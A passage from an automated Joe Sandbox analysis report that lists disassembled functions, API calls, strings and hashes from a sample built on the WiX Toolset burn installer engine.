                                                                                                                                                                  Function 00977BD8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79timeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00977E27: lstrlenW.KERNEL32(?), ref: 00977EF4
                                                                                                                                                                    • Part of subcall function 00977E27: lstrlenW.KERNEL32(00000000), ref: 00977F0A
                                                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000000,?,00978702,?,00000000,HEAD,00000000,00000000,00978702,00000000,?,?,00000000,00000000), ref: 00977C79
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp, xrefs: 00977C30
                                                                                                                                                                  • HEAD, xrefs: 00977C08
                                                                                                                                                                  • Failed to connect to URL: %ls, xrefs: 00977C21
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Timelstrlen$FileSystem
                                                                                                                                                                  • String ID: Failed to connect to URL: %ls$HEAD$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
                                                                                                                                                                  • API String ID: 3954044709-1251758901
                                                                                                                                                                  • Opcode ID: 08550bfb74bfd5c24a30d35c5d11c2560e869884d7099d3e5bf9bf6ce286961f
                                                                                                                                                                  • Instruction ID: 09786c148e57e37305c35cc7389e178599d292b58115b6f655771c7eadf97b4e
                                                                                                                                                                  • Opcode Fuzzy Hash: 08550bfb74bfd5c24a30d35c5d11c2560e869884d7099d3e5bf9bf6ce286961f
                                                                                                                                                                  • Instruction Fuzzy Hash: EA218172A04219FFDF169F94CD46EAFBBB9EF49700F158169F805A3350D7709E109AA0
                                                                                                                                                                  Function 0097666D Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 00976717
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\polcutil.cpp, xrefs: 0097669E, 009766F8
                                                                                                                                                                  • Failed to open policy key: %ls, xrefs: 00976692
                                                                                                                                                                  • Failed to open policy key: %ls, name: %ls, xrefs: 009766EC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Failed to open policy key: %ls$Failed to open policy key: %ls, name: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\polcutil.cpp
                                                                                                                                                                  • API String ID: 3535843008-3938230626
                                                                                                                                                                  • Opcode ID: 1a5c5fcff71b742c95a74bca01c53a0b913262ec9757603505165d48ac970f40
                                                                                                                                                                  • Instruction ID: 5514b2fcde7d55961a11a8f4de2f8876985b1a6a186028dd8ded05be83e82923
                                                                                                                                                                  • Opcode Fuzzy Hash: 1a5c5fcff71b742c95a74bca01c53a0b913262ec9757603505165d48ac970f40
                                                                                                                                                                  • Instruction Fuzzy Hash: EA21EB77A40729BBDF255ED48C86F9E7A6CEB44B94F11C025FE0976190D2B48D20D6D0
                                                                                                                                                                  Function 0096CCD3 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,?,0092828D,?,Resume,00000000,?,?,00000001,?,00000000,00000000,00000024), ref: 0096CD06
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: QueryValue
                                                                                                                                                                  • String ID: Error reading version registry value due to unexpected data type: %u$Failed to query registry key value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                  • API String ID: 3660427363-2246233778
                                                                                                                                                                  • Opcode ID: bb93b935a9256e7aa193fca79af5a900090bb482e2a4ba3f91f1ca13de1e2151
                                                                                                                                                                  • Instruction ID: c6c9f8a3119cc219a4d7f78ebc5b73c4b35aa6ec483246714f687765fdc7dbaa
                                                                                                                                                                  • Opcode Fuzzy Hash: bb93b935a9256e7aa193fca79af5a900090bb482e2a4ba3f91f1ca13de1e2151
                                                                                                                                                                  • Instruction Fuzzy Hash: 4911E6B2A00158B7EB205A158C49FAF7EADDBC6754F25003AFB04A7281E1744E4296F0
                                                                                                                                                                  Function 009740F8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,?,00000000,000000FF,00000000,000000FF,00000000,?,00981D1C,00000000,00000000,00000000,00000000,00000000), ref: 0097418A
                                                                                                                                                                  Strings
                                                                                                                                                                  • Invalid dictionary - bucket size index is out of range, xrefs: 0097410D
                                                                                                                                                                  • Failed to hash the string., xrefs: 0097414D
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dictutil.cpp, xrefs: 00974121
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                  • String ID: Failed to hash the string.$Invalid dictionary - bucket size index is out of range$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dictutil.cpp
                                                                                                                                                                  • API String ID: 1825529933-1798595610
                                                                                                                                                                  • Opcode ID: 7686cd63b2d7b6210eba768c3f73ded3a3d1435f72b37141266784dac0865019
                                                                                                                                                                  • Instruction ID: 19725f5c6307d3732edb7aa761211b55c6b2b9fb42abb2dd65b30a34630a3c94
                                                                                                                                                                  • Opcode Fuzzy Hash: 7686cd63b2d7b6210eba768c3f73ded3a3d1435f72b37141266784dac0865019
                                                                                                                                                                  • Instruction Fuzzy Hash: 68210332758205FBCB10DF88DC85F6AB368FB22724F518214F5189B292C774E990DBA0
                                                                                                                                                                  Function 00977545 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 68COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00916EDE,00916DEA,00916DA2,8351EC8B,5300FC65,F6B70F0B,00916DEA,00916D72,00917172,00916D72,00916ECA,00916EDE,00917162,00916DEA,00916EDE,00000000), ref: 00977556
                                                                                                                                                                    • Part of subcall function 0096BFC9: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,00916E9A,00000001,00916DEA,?,?,?,00977562,00000000), ref: 0096BFE1
                                                                                                                                                                    • Part of subcall function 0096BFC9: GetProcAddress.KERNEL32(00000000), ref: 0096BFE8
                                                                                                                                                                    • Part of subcall function 0096BFC9: GetLastError.KERNEL32(?,?,?,00977562,00000000), ref: 0096C010
                                                                                                                                                                    • Part of subcall function 0097729B: RegCloseKey.ADVAPI32(00000000,00020019,?,?,00916E9A,00000001,00916DEA), ref: 00977376
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\butil.cpp, xrefs: 009775F2
                                                                                                                                                                  • Failed to query 64-bit related bundles., xrefs: 009775E3
                                                                                                                                                                  • Failed to query 32-bit related bundles., xrefs: 009775B6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressCloseCurrentErrorHandleLastModuleProcProcess
                                                                                                                                                                  • String ID: Failed to query 32-bit related bundles.$Failed to query 64-bit related bundles.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\butil.cpp
                                                                                                                                                                  • API String ID: 3109562764-3570192855
                                                                                                                                                                  • Opcode ID: d7d639cd6dd8c147554dc2ab77cbb85ed582721e3030ccf52dba68b287bc7b25
                                                                                                                                                                  • Instruction ID: 9da4a2cb9c1fc4769f0494e7d955e5f32528e5947839f20c7d69dcd2140ce8df
                                                                                                                                                                  • Opcode Fuzzy Hash: d7d639cd6dd8c147554dc2ab77cbb85ed582721e3030ccf52dba68b287bc7b25
                                                                                                                                                                  • Instruction Fuzzy Hash: 0021C4B5E41229AFCB51DFA8D885BCEBBF4AB08754F048516F819F7380E7749A408F90
                                                                                                                                                                  Function 0096D664 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0096CBC2: RegOpenKeyExW.KERNELBASE(?,0096CBBE,00000000,00000000,00000003,00000000,?,?,00976603,80000002,00000000,00020019,00000000,00000000,SOFTWARE\Policies\,00000000), ref: 0096CBED
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00020019,00000000,00000000,00000000,?,?,?,0092713E,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootPending,00000000,00000000,80000002), ref: 0096D707
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to open key: %ls, xrefs: 0096D6A4
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp, xrefs: 0096D6B3, 0096D6F0
                                                                                                                                                                  • Failed to read value type: %ls/@%ls, xrefs: 0096D6E1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                  • String ID: Failed to open key: %ls$Failed to read value type: %ls/@%ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                  • API String ID: 47109696-3852982929
                                                                                                                                                                  • Opcode ID: 9e5452ab200f27eb5670ef22b874b8f4346c180e3e6564f285d8db28e3218e37
                                                                                                                                                                  • Instruction ID: 5a12ceab5b601cea6228a045441d14f4d35f117fe5907fdb6d64ba617eccdf60
                                                                                                                                                                  • Opcode Fuzzy Hash: 9e5452ab200f27eb5670ef22b874b8f4346c180e3e6564f285d8db28e3218e37
                                                                                                                                                                  • Instruction Fuzzy Hash: 5B11E772F41228BBDF219F84CC0AFEE7A69EB49714F004150FE287A191D2B14E50EBD1
                                                                                                                                                                  Function 00925CD4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,00000000,000000FF,IGNOREDEPENDENCIES,00000000,00000000,?,?,009303A0,00000000,IGNOREDEPENDENCIES,00000000,00000000), ref: 00925D26
                                                                                                                                                                  Strings
                                                                                                                                                                  • IGNOREDEPENDENCIES, xrefs: 00925CDD
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\package.cpp, xrefs: 00925D6C
                                                                                                                                                                  • Failed to copy the property value., xrefs: 00925D5A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                  • String ID: Failed to copy the property value.$IGNOREDEPENDENCIES$d:\a\wix4\wix4\src\burn\engine\package.cpp
                                                                                                                                                                  • API String ID: 1825529933-2032719239
                                                                                                                                                                  • Opcode ID: 914267e72d1813e5a5010ba2ee70148832f6afa4186739a2b0fba5b24ee57fa7
                                                                                                                                                                  • Instruction ID: dd079c1ab54caa1e82293914a0b5643c339abf47ab98799654d0dc0fc3fc31a4
                                                                                                                                                                  • Opcode Fuzzy Hash: 914267e72d1813e5a5010ba2ee70148832f6afa4186739a2b0fba5b24ee57fa7
                                                                                                                                                                  • Instruction Fuzzy Hash: 25112731600625BBDB109B84AC8EFD9B3A4EF44720F320675F715AB2E4D2B0AC50C790
                                                                                                                                                                  Function 00956155 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62synchronizationCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(0097E860,000000FF,00000000,00000002,?,?,009563B6,00000000,?,?,?), ref: 00956165
                                                                                                                                                                  • ReleaseMutex.KERNEL32(0097E860,?,009563B6,00000000,?,?,?), ref: 009561FB
                                                                                                                                                                    • Part of subcall function 0091540B: GetProcessHeap.KERNEL32(?,00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 0091541C
                                                                                                                                                                    • Part of subcall function 0091540B: RtlAllocateHeap.NTDLL(00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00915423
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$AllocateMutexObjectProcessReleaseSingleWait
                                                                                                                                                                  • String ID: Failed to allocate memory for message data$d:\a\wix4\wix4\src\burn\engine\netfxchainer.cpp
                                                                                                                                                                  • API String ID: 2993511968-954368992
                                                                                                                                                                  • Opcode ID: 948f897f6c02997f6df073188a358f42d8179a01f3f0c14942db87758d38e5d5
                                                                                                                                                                  • Instruction ID: 1e2f3f2ffce7e6e68ec5a559f8e26640216815261a151c4a5dd33767a445660d
                                                                                                                                                                  • Opcode Fuzzy Hash: 948f897f6c02997f6df073188a358f42d8179a01f3f0c14942db87758d38e5d5
                                                                                                                                                                  • Instruction Fuzzy Hash: 57117FB1300615AFCB14CF29DC85FAAB7A8FF49720F104564FA189B3A2D771A8508BA0
                                                                                                                                                                  Function 009290C9 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 60registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00916DA2,00000002,00000001,00000000,00000000,?,?,?,?,?,?,00932F8D,00916DA2,00000001,00000001), ref: 0092997D
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 009290F5, 00929959
                                                                                                                                                                  • Failed to cache bundle from path: %ls, xrefs: 009290E3
                                                                                                                                                                  • Failed to create registration key., xrefs: 0092912A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Failed to cache bundle from path: %ls$Failed to create registration key.$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                  • API String ID: 3535843008-2361216137
                                                                                                                                                                  • Opcode ID: 05775b080750e1d12119034ef5fd852aac12cf9849402b33aefa1de2fefc2f45
                                                                                                                                                                  • Instruction ID: f6aa3f7c8f4d4831b88ae0f7806f212700243c09240440cccdb4efe439a7cd3c
                                                                                                                                                                  • Opcode Fuzzy Hash: 05775b080750e1d12119034ef5fd852aac12cf9849402b33aefa1de2fefc2f45
                                                                                                                                                                  • Instruction Fuzzy Hash: 3811E532B44225BBDF12AA91EC4BFEF7A659F48724F100151FB01B91D6D6A1C890DBA1
                                                                                                                                                                  Function 009703DA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 009700B5: SysAllocString.OLEAUT32(00000000), ref: 009700C9
                                                                                                                                                                    • Part of subcall function 009700B5: VariantInit.OLEAUT32(?), ref: 009700D5
                                                                                                                                                                    • Part of subcall function 009700B5: VariantClear.OLEAUT32(?), ref: 009701C4
                                                                                                                                                                    • Part of subcall function 009700B5: SysFreeString.OLEAUT32(00000000), ref: 009701CF
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000001), ref: 00970466
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to treat attribute value as UInt64., xrefs: 00970435
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 0097040B
                                                                                                                                                                  • failed XmlGetAttribute, xrefs: 009703FC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$FreeVariant$AllocClearInit
                                                                                                                                                                  • String ID: Failed to treat attribute value as UInt64.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed XmlGetAttribute
                                                                                                                                                                  • API String ID: 3379191133-2593243594
                                                                                                                                                                  • Opcode ID: c2b8ceddda952073e5e23c86ec1088c07f3fadac6b914461a5acd0ca32c06df9
                                                                                                                                                                  • Instruction ID: 57b4e3f22c514daaa3f25e1cf3a7921d15dd2f8af87a560527270f16ab4c50ee
                                                                                                                                                                  • Opcode Fuzzy Hash: c2b8ceddda952073e5e23c86ec1088c07f3fadac6b914461a5acd0ca32c06df9
                                                                                                                                                                  • Instruction Fuzzy Hash: 5A119172E40318FFDB119F54CC82EAEBB78EB45754F10C0A5F909AB291E2718E00DA90
                                                                                                                                                                  Function 009734CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ReadFile.KERNEL32(00000004,00000004,?,?,00000000,?,00000000,00000000,?,?,0092C427,?,?,00000004,?,00000004), ref: 009734F1
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0092C427,?,?,00000004,?,00000004,00000004,?,?,00000004,?,00000004,00000004), ref: 009734FB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastRead
                                                                                                                                                                  • String ID: Failed to read data from file handle.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                                  • API String ID: 1948546556-2736598211
                                                                                                                                                                  • Opcode ID: b889404968f219cc2e7856b549b498d9ee62f9f2785b55b955132cec45c162c4
                                                                                                                                                                  • Instruction ID: 6e4936ccd99ce930a0858d00c562fbb4ab92b67aa870de984f5ed7b5ed19a7d3
                                                                                                                                                                  • Opcode Fuzzy Hash: b889404968f219cc2e7856b549b498d9ee62f9f2785b55b955132cec45c162c4
                                                                                                                                                                  • Instruction Fuzzy Hash: BA019273B41238BBD7209A99DC85FAFB66CAB55B64F11C525BE0CF7140E264AF0062E1
                                                                                                                                                                  Function 0096CAFE Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0096CBC2: RegOpenKeyExW.KERNELBASE(?,0096CBBE,00000000,00000000,00000003,00000000,?,?,00976603,80000002,00000000,00020019,00000000,00000000,SOFTWARE\Policies\,00000000), ref: 0096CBED
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00020019,00000000,00000000,00000000,?,?,00927102,80000002,SOFTWARE\Microsoft\ServerManager,CurrentRebootAttempts,00000000,00916EDE,00000000), ref: 0096CB9B
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to open key: %ls, xrefs: 0096CB39
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp, xrefs: 0096CB48, 0096CB84
                                                                                                                                                                  • Failed to read value: %ls/@%ls, xrefs: 0096CB75
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
